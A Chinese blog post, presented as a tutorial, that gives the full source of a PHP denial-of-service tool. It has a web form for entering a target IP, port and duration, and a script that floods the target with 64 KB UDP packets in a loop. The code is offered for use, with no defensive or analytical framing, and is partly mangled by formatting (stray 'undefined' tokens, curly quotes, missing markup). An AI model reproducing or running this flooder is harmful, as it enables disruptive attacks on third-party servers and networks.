【教程分享】

index.php

$ip = $_SERVER[‘REMOTE_ADDR’];

?>

-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>

PHP DoS, Coded by EXE

body {undefined

font-family: Arial, Helvetica, sans-serif;

font-size: 12px;

font-style: normal;

line-height: normal;

 

color: #FFFFFF;

 

background-color: #000000;

 

}

 

–>

 

你的 IP: <?php echo $ip; ?> (请勿以你的ip作为攻击目标)

 

IP:

 

    Time:

 

    Port:

 

发起DOS攻击后,请等待浏览器加载

 

function.php

 

$packets = 0;

 

$ip = $_POST[‘ip’];

 

$rand = $_POST[‘port’];

 

set_time_limit(0);

 

ignore_user_abort(FALSE);

 

$exec_time = $_POST[‘time’];

 

$time = time();

 

print “Flooded: $ip on port $rand

”;

 

$max_time = $time+$exec_time;

 

for($i=0;$i<65535;$i++){undefined

 

$out .= “X”;

 

}

 

while(1){undefined

 

$packets++;

 

if(time() > $max_time){undefined

 

break;

 

}

 

$fp = fsockopen(“udp://$ip”, $rand, $errno, $errstr, 5);

 

if($fp){undefined

 

fwrite($fp, $out);

 

fclose($fp);

 

}

 

}

 

echo “Packet complete at “.time(‘h:i:s’).” with $packets (” . round(($packets*65)/1024, 2) . ” mB) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;

 

?>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值